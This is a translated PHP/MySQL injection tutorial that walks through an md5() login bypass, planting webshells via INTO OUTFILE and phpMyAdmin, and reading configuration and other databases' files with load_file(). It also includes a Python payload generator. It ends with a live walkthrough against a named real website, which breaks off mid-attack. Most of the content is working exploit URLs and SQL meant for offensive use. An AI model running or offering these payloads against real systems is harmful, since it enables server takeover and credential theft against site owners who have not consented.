PHP injection (part 4)
Jun 21, 2016 09:15 AM
4. The md5 nightmare
Dr. Wang of Shandong University has been all over the news lately for breaking md5. Let's have a go at md5 too; we'll have more fun than that, with no computation needed at all, haha.
There is a way around md5, but not everywhere. PHP's md5() function cannot be bypassed, because everything you enter goes inside it and nothing gets out. What can be bypassed is md5() inside the SQL statement. Other SQL functions can be bypassed the same way, for the same reason.
Look at the example first:
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
We submit directly in the browser:
http:/login.php?username=char(97,98)) or 1=1 %23
Substituted into the SQL statement it becomes select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw." , and everything from # onwards is a MySQL comment.
Remember that md5() takes a string. Since we put or 1=1 after it, what goes into md5() does not matter, so we just put in char(97,98) (the string "ab", built without any quote character). OK, logged in! See, md5 is of no use against us here.
5. Core technique: writing a webshell directly through a php+mysql injection
Getting a webshell straight out of the injection is what everyone wants, so here is how.
This assumes you already know the physical path of the site; here we take the site path to be c:/apache/htdocs/site. The site's MySQL connection details are in /lib/sql.inc.php.
1) Applies when magic_quotes_gpc=Off
Suppose we can upload images, or txt, zip and other files. We rename our backdoor to a .jpg suffix and upload it; say it ends up at /upload/2004091201.jpg.
The content of 2004091201.jpg is:
Good, now we go: http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('C:/apache/htdocs/site/upload/2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile 'C:/apache/htdocs/site/shell.php'
Because into outfile is used, the page no longer renders normally, but our job is done.
See Figure 28.
Let's hurry over to http://localhost/site/shell.php?cmd=dir
See Figure 29.
Nice? Our webshell has been created. See the 1 and 2 at the very front? Those are the 1,2 from our select being written out as well!
2) Next, a method for saving a webshell when magic_quotes_gpc=On, which obviously also works when magic_quotes_gpc=Off.
We read its configuration file directly, using the method from trick 2:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
We get the content of sql.inc.php:
Now we know the MySQL root password. We find the phpMyAdmin backend
http://localhost/phpmyadmin/
and log in as root with an empty password.
See Figure 30.
Then we create a new table with the following structure:
#
# Table structure for table `te`
#
CREATE TABLE te (
  cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
#
# Dumping data for table `te`
#
INSERT INTO te VALUES ( );
OK, time for select * from table into outfile.
Directly in phpMyAdmin's SQL box enter:
SELECT * FROM `te` INTO OUTFILE 'C:/apache/htdocs/site/cmd1.php';
See Figure 31.
OK, it executed successfully; let's go to http://localhost/site/cmd1.php?cmd=dir and see the result.
See Figure 32.
A lovely webshell, isn't it! Haha, I like it a lot too.
But did you notice that we did all this with magic_quotes_gpc=On, and inside phpMyAdmin we did not have to worry about the quote restriction at all? What does that tell you? That phpMyAdmin is great: the quotes are typed straight into its SQL box, so the target application's magic_quotes_gpc never touches them. That is exactly the point we were holding back when we discussed bypassing magic_quotes_gpc=On!
6. Note that we can also use update and insert to put our data in, and then get our webshell out of it. Using the example above again:
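To make the quote handling in sections 4 and 5 concrete, here is an added Python example; it is not code from the original article and is not tied to any real site. It ports the $query concatenation of login.php from section 4 to Python, applies PHP's addslashes() the way magic_quotes_gpc=On would, and generates the quote-free char() and 0x encodings that sections 5 and 8 use with load_file(). The helper names, the assumption that the real login.php wraps the Password value in single quotes, and the sample paths are assumptions made for this illustration (the sql.inc.php path is the one behind the 0x... literal above).

```python
"""Added example (not from the original article): port the string
concatenation of login.php / display.php to Python, apply PHP's
addslashes() the way magic_quotes_gpc=On does, and build the quote-free
char()/0x encodings used with load_file() in sections 5 and 8.

Assumptions for this illustration: the helper names, the Password column
being wrapped in single quotes in the real login.php, and the sample paths."""

import re


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ' " \\ and NUL, which is what
    magic_quotes_gpc=On applies to every GET/POST/COOKIE value."""
    return re.sub(r"(['\"\\])", r"\\\1", s).replace("\x00", "\\0")


def build_login_query(username: str, pw: str, magic_quotes: bool) -> str:
    """Python port of the $query concatenation in section 4's login.php."""
    if magic_quotes:
        username, pw = addslashes(username), addslashes(pw)
    return ("select * from alphaauthor where UserName=md5(" + username
            + ") and Password='" + pw + "'")


def mysql_char(s: str) -> str:
    """Encode a string as MySQL char(...): usable where a string is
    expected but no quote character may appear in the request."""
    return "char(" + ",".join(str(b) for b in s.encode("latin-1")) + ")"


def mysql_hex(s: str) -> str:
    """Encode a string as a MySQL 0x... literal, which is also quote-free."""
    return "0x" + s.encode("latin-1").hex().upper()


def union_load_file(path: str, columns: int, position: int, encoder=mysql_hex) -> str:
    """Build the ' and 1=2 union select ...' tail of a display.php?id= payload
    that places load_file(path) in the (1-based) column the page echoes."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = "load_file(" + encoder(path) + ")"
    return " and 1=2 union select " + ",".join(cols)


# Payload from section 4: md5(char(97,98)) or 1=1 #   (no quotes anywhere)
MD5_BYPASS = mysql_char("ab") + ") or 1=1 #"
# Constructed sample paths; the first is the one behind section 5's 0x... literal
SQL_INC = "C:/apache/htdocs/site/lib/sql.inc.php"
SHOW_PHP = "d:/web/heibai/down/show.php"


if __name__ == "__main__":
    for on in (False, True):
        print("magic_quotes_gpc=%s:" % ("On" if on else "Off"),
              build_login_query(MD5_BYPASS, "whatever", on))
    # A quote-based probe in the password field is what addslashes() does break:
    print(build_login_query("x", "' or '1'='1", True))
    print("id=451" + union_load_file(SQL_INC, 11, 3))
    print("id=5403" + union_load_file(SHOW_PHP, 19, 12, mysql_char))
```

Running it prints the same login query with magic_quotes_gpc On and Off, because the payload contains no single quote, double quote or backslash for addslashes() to escape; the password-field probe with a quote shows what does get escaped. INTO OUTFILE is deliberately left out: MySQL accepts only a plain string literal there, not char() or 0x, which is exactly why the magic_quotes_gpc=On case above falls back to phpMyAdmin.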
//reg.php
......
$query = "INSERT INTO members
VALUES( $id , $login , $pass , $email , 2 )" ;
......
?>
In the email field we enter:
Suppose the id we get after registering is 10.
Then we find another injectable spot:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile 'C:/apache/htdocs/site/test.php'
Good, now we have our webshell again.
7. MySQL cross-database queries
Everyone has always heard that MySQL cannot query across databases, right? Haha, today I'll teach you a good trick for an indirect cross-database query: use load_file to read the files under MySQL's data folder directly, which gives us a roundabout cross-database query.
Here is an example.
Before that, a word on the layout of MySQL's data folder.
Under the data folder there is one folder per database, named after the database, and in it each table has three files with the suffixes .frm, .MYD and .MYI. For example,
MySQL has a database alpha, and alpha has two tables, alphaauthor and alphadb.
The contents of the alpha folder are shown in Figure 33.
alphadb.MYD holds the row data of the alphadb table, alphadb.frm holds the table structure, and alphadb.MYI holds the table's indexes; you can open them in Notepad to see for yourself.
Let the experiment begin.
Suppose we know that another database, yminfo210, exists, with a table user that holds the admin's information.
We request
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210/user.myd'),4,5,6,7,8,9,10,11
Note: load_file's default directory is MySQL's data directory, so we use
load_file('yminfo210/user.myd'); load_file('./yminfo210/user.myd') works just the same. Be aware that the default path for into outfile, by contrast, is the folder of the current database.
The result is shown in Figure 34.
Looking at what came out:
[binary bytes] admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.com admin question admin answer http://www.yoursite.com [binary bytes] 127.0.0.1 [binary bytes] aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd [binary bytes] 127.0.0.1 222 222222223423
Garbled as it is, we can still make out that the username is admin and the password is 698d51a19d8a121ce581499d7b701668 (an md5 hash); the rest is other information.
This is how we get our roundabout cross-database query; the example below uses it too!
Enough talk; let's put it to use for real. This time the test target is a well-known domestic security site: heibai.net (黑白网络).
Word is that Heibai has a hole? Let's go and see.
http://www.heibai.net/down/show.php?id=5403%20and%201=1
Displays normally.
See Figure 35.
http://www.heibai.net/down/show.php?id=5403%20and%201=2
Does not display normally.
See Figure 36.
Good, we continue:
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
The result is shown in Figure 37.
Note that the figure shows no program name, and the page also came with:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578
Whoa, the site's path has leaked; now it's as good as dead!
We keep adding columns until, at
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
the page displays normally again.
See Figure 38.
Good, now we switch the statement to
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
which displays as in Figure 39.
Look at the description field: it shows 12, so we can guess that this column is a string type!
OK, now let's look at some file contents first.
d:/web/heibai/down/show.php converted to ASCII codes is
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
We submit
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source: means view the page source; why we need it is explained below.
Its source code is displayed.
See Figure 40.
This is because show.php contains a line that, if we submit the URL directly in the browser, redirects us to list.php.
We find this line: require ("./include/config.inc.php");
Good stuff: that should be where the configuration lives. OK, continue:
d:/web/heibai/down/include/config.inc.php
converts to char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
We enter:
